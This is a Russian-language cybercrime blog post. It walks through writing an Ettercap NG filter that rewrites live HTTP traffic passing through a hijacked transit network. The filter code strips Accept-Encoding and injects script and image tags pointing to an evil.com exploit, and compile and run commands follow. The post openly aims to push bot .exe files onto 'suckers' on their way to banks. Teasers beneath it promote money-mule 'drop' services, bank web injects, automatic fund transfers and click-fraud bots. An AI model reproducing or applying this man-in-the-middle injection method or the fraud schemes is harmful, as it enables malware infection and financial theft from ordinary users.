Skip to main content

Фильтры Ettercap NG умеют модифицировать транзитный трафик


Продолжу тему загрузок .ехе на компы обычных пользователей, собственно требуется «заставить» лоха перейти на страницу со сплоитом, который и прогрузит .ехе ему на комп

Представим, что мы получили во временное пользование чью-то транзитную AS и у нас открылись широчайшие возможности доступа к трафику.
Размножение ботов с помощью Ettercap NG

На сей раз воспользуемся такой хорошей вещью как «Ettercap NG». Что приятно — есть и GUI’шный интерфейс, и консольная версия. Последняя версия — 0.7.3. На сайте ettercap.sourceforge.net есть исходники как под разные виды nix’ов, так и под винду. В общем, это сниффер, наделенный важными и нужными для нас возможностями.

В их число входят:
  • Вынимание и, если надо, расшифровывание логинов и паролей к большому числу протоколов
  • Модификация передаваемых в обоих направлениях пакетов
  • Проведение Man in the Middle атак (MitM)
  • Пассивный анализ трафика с фингерпринтом ОС, сервисов хостов
К тому же, Ettercap расширяет свой функционал за счет всевозможных плагинов.
Но для данной задачи нам потребуются его возможности по поиску и модификации данных TCP/IP-пакетов на «живом» трафике.

Общая идея такова: во-первых, имея доступ к трафику устанавливаем фильтр для Ettercap’а на модификацию HTTP-ответов от серверов, куда наши лохи заходят. Модификация будет заключаться в добавлении либо сплойта, либо ссылки на сплойт. Для точности буду рассказывать о консольной версии Ettercap, входящей в BackTrack 3.
Для этого создадим текстовый файлик «http_filter.txt» и пишем в него следующий код — фильтр на HTTP-трафик.

Код:
//Если протокол – TCP, удаленный порт – 80
if (ip.proto == TCP && tcp.dst == 80) {
//Ищем строку
if (search(DATA.data, "Accept-Encoding")) {
//Заменяем на мусор
replace("Accept-Encoding", "Blabla-Blahblah");
//Мессага для нас
msg("Accept-Encoding field has been changed\n"); } }
//Если протокол – TCP, исходящий порт – 80
if (ip.proto == TCP && tcp.src == 80) { replace("</body>", " <script type=\"text/javascript\" src=\"http://evil.com/sploit.js\"></script> \" ");
// Меняем ответ сервера – HTML-страницу, подставляя какой-то свой сплойт
replace("</html >", " <img src=\"http://evil.com/evil.gif\"></img>"); msg("Success!\n");
//Мессага для нас }

Для создания фильтров к Ettercap существует примитивный «язык», которым мы и воспользовались. Здесь мы создали два «правила». Первое применяется к пакетам, отправленным на 80 порт по протоколу TCP. Обычно это запросы браузера на открытие той или иной страницы веб-серверу. В них ищем строчку «Accept-Encoding» (поле стандартного HTTP-заголовка, посылаемого браузером) и меняем ее на любой другой текст того же размера (это важно). Требуется это, потому что обычно в «Accept-Encoding» указывается, что ответы от веб-сервера можно сжимать. Но по сжатым данным мы не сможем провести необходимое нам изменение HTML-страниц. Поэтому мы меняем это поле на что-нибудь другое. Сервер же при разборе пропустит это кривое поле и ответит нам в несжатом виде. Второе правило применяется уже к принимаемым данным. Ситуация похожая. Делаем выборку пакетов от веб-сервера (протокол TCP, исходящий порт — 80). И меняем строчки «», «» на либо яваскриптовский, либо рисунок-сплойт, не суть важно.

Почему именно эти теги будем менять? У них есть один плюс — они присутствуют почти на всех HTML-страничках в единичном числе, что повысит шансы на успешную эксплуатацию уязвимости при малом количестве запросов к нашему серваку. Но все зависит от ситуации, браузера жертвы и т.д. Еще пара моментов: функция «replace» регистрозависима, то есть можно повторить искомые строчки в разных регистрах, а функция «msg» выводит нам сообщения в логах, чтобы мы знали, когда правило задействовалось.Далее требуется переварить наш текстовый файл с фильтром в удобоваримый для Ettercap’a вид.

Пишем в консоли:etterfilter http_filter.txt -o http_filter.ef
Где http_filter.txt — наш файл с фильтром, а в «-o http_filter.ef» указываем имя будущего Еttercap-фильтра (необязательная опция).

Далее запускаем сам Ettercap.ettercap -T -F http_filter.ef
Где опция «-T» указывает на то, что мы запускаем текстовую версию Ettercap и «-F http_filter.ef» — подключаем полученный от Etterfilter фильтр.

В итоге Ettercap будет фильтровать трафик, проходящий от лохов через нашу транзитную AS к банковским и финансовым учреждениям, добавляя в конец каждой HTML’ки наш сплойт.




Как ты понимаешь, Ettercap — тулза крутая, особенно с возможностями фильтров, а они широки. Это и изменение, декодирование пакетов, и использование регекспов, и запуск команд… Основную инфу можно почерпнуть из man’ов и прилагаемых к Ettercap’у примеров.

Comments

Popular posts from this blog

Кокаин попал в меня во время секса

Чемпион мира по прыжкам с шестом Шон Барбер не нарушил спортивных правил и имел право выступать на Олимпиаде в Рио-де-Жанейро, несмотря на положительную допинг-пробу на кокаин. Как заявила Федерация легкой атлетики Канады, наркотик попал в организм спортсмена без его ведома.

В случае признания виновным Барберу угрожала дисквалификация со стороны Канадского центра по этике в спорте сроком до двух лет. Комиссии, рассматривавшей его дело 5 августа, он сообщил, что наркотик попал в его организм через поцелуй.

22-летний атлет рассказал, что вечером накануне национального отборочного турнира Олимпиады-2016 он разместил анкету на сайте знакомств в интернете, где написал, что ищет случайной связи с девушкой "чистой от наркотиков и болезней".

Как выяснилось в ходе разбирательства, Барбер искал секса для того, чтобы снять нервное напряжение. Женщина, с которой он имел контакт, пояснила, что употребляла наркотик перед свиданием, а во время их встречи поцеловала атлета несколько раз, н…

Как найти заливщика на карту

Своего первого реального заливщика, который показал мне как можно скачать деньги в интернет с банковских счетов, я нашел случайно, когда еще трудился в Укртелекоме сменным инженером немного подрабатывая продавая трафик налево, но потом этот человек отошел от дел в связи со слишком уж скользкой ситуацией в данной сфере, и я решил поискать партнера на форумах, разместив рекламу на трёх электронных досках объявлений. Честно говоря поначалу даже был готов сразу закинуть 500 000 гривен в Гарант, но потом призадумался, а стоит ли?

Ко мне начал обращаться народ обращается разных категорий

1. Дебильная школота, которая что-то любит повтирать про свою серьезность и просит закинуть 10 000 USD им на Вебмани в качестве аванса 
2. Реальные мэны, которые льют сразу большую сумму по SWIFT без разговоров про гарантии и прочую шнягу, но после того, как им отдаёшь нал, они сразу пропадают, суть данных действий я так и не понял. зачем пропадать, если всё прошло гладко? 3. Мутные личности, берущие реквизиты …

Обзор инжектов и автозаливов

Не так давно в украинском сегменте интернета появился новый сервис по написанию автозаливов (АЗ) и инжектов. 

Судя по рекламным объявлениям ребята работают более двух лет в этой сфере и гарантируют высокое качество выпускаемого программного продукта, с возможностью реализовать практически любые задумки заказчика.

Основной спектр услуг этой компании довольно большой.

GRABBER
Баланс
Залив – АЗ любой сложности, независимо от того что нужно для залива (актив и пассив)
Данные на вход 
Обходы на входе 
Обходы внутри (токена, ридера и так далее, даже если валид тайм меньше минуты)
Реплэйсеры 
Подмены баланса любой сложности, с проверкой списания, расчетом баланса в траншах

ADMIN PANEL
Grabber
АЗ
Обходов
Подмен и всего остального

С каждым новым инжектом база технологий совершенствуется, имеется множество уникальных js прототипов, php фрэймворков и т.д., ниже представленная коллекция постоянно пополняется новыми и свежими идеями.  Они больше не используют куки, ajax в обычном смысле его понимания, - можете заб…

Black Hat SEO или бот для скликивания контекстной рекламы

На днях мне стало интересно, а каким образом с точки зрения «черных» методов SEO могут быть использованы хакерские программы – например, путем генерации трафика для заинтересованных ресурсов или скликивания контекстной рекламы AdWords или Яндекс.Директ
Понятно, что увеличение числа посетителей на сайте интернет-магазина или компании, занимающейся недвижимостью, вероятнее всего положительно скажется на их доходах. Поэтому разработка подобного типа программ — вполне себе обыденное дело, и появились такие программы уже давно. По большей части таких ботов можно разделить на два класса — это различного рода Adware, которое распространяется вместе с популярными программами, или трояны, которые осуществляют более серьезную модификацию системы.  Win32/Patched.P Давай для начала рассмотрим достаточно экзотический, но от этого не менее интересный способ подмены результатов поиска в популярных поисковых сервисах Яндекс и Google, который был реализован в троянской программе Win32/Patched.P (ESET)…

Залив на карту, BitCoin mining или как ещё можно получать живые деньги в сети

В нынешних компьютерах и смартфонах хранятся живые деньги. Ну, пусть не хранятся, но уж доступ-то к ним вполне себе можно поиметь, причём практически за так! 
Как известно, времена идейных хактивистов давно прошли, в отдельно взятых странах наступил капитализм, и пишут вредоносный код теперь почти исключительно на коммерческой основе именно для того, чтобы скачать деньги с телефона или банковского счёта какого-нибудь лоха. Конечно, идейные люди остались, но они скорее поставщики интересных фишек и способов обхода механизмов безопасности операционной системы Windows, а другие, более ушлые люди реализуют эти наработки в своих творениях для заработка онлайн.

Скачать деньги со карты или счёта лоха можно, так сказать, прямо и косвенно. Одни боты для заработка ориентируются на монетизацию аппаратных ресурсов и вычислительных мощностей конечных пользователей. Сюда относятся: организация прокси- и DDoS-атак, рассылка спама, bitcoin-майнинг, накрутка посещений сайтов (black SEO), переход по р…